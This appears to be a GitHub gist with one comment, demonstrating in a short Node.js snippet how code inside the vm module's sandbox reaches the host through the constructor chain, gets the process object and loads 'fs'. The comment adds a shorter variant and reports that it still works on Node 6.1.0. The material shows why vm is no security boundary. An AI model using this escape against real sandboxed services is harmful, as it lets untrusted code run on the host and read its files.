Star 8
Fork 0

domenic/escape-vm.js
Created Aug 17, 2015

Escaping the vm sandbox

Raw

escape-vm.js

      
        "use strict";
      
        const vm = require("vm");
      
        const sandbox = { anObject: {} };
      
        const whatIsThis = vm.runInNewContext(`
      
            const ForeignObject = anObject.constructor;
      
            const ForeignFunction = ForeignObject.constructor;
      
            const process = ForeignFunction("return process")();
      
            const require = process.mainModule.require;
      
            require("fs");
      
        `, sandbox);

NiXXeD commented May 13, 2016 •

edited

Technically you can also just do:
const ForeignFunction = this.constructor.constructor;
since the context object itself is created in the context you want. You don't even need a foreign object.

Also, this still appears to be an issue in Node 6.1.0. Just tested this for a silly Hubot script we have.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

You can’t perform that action at this time.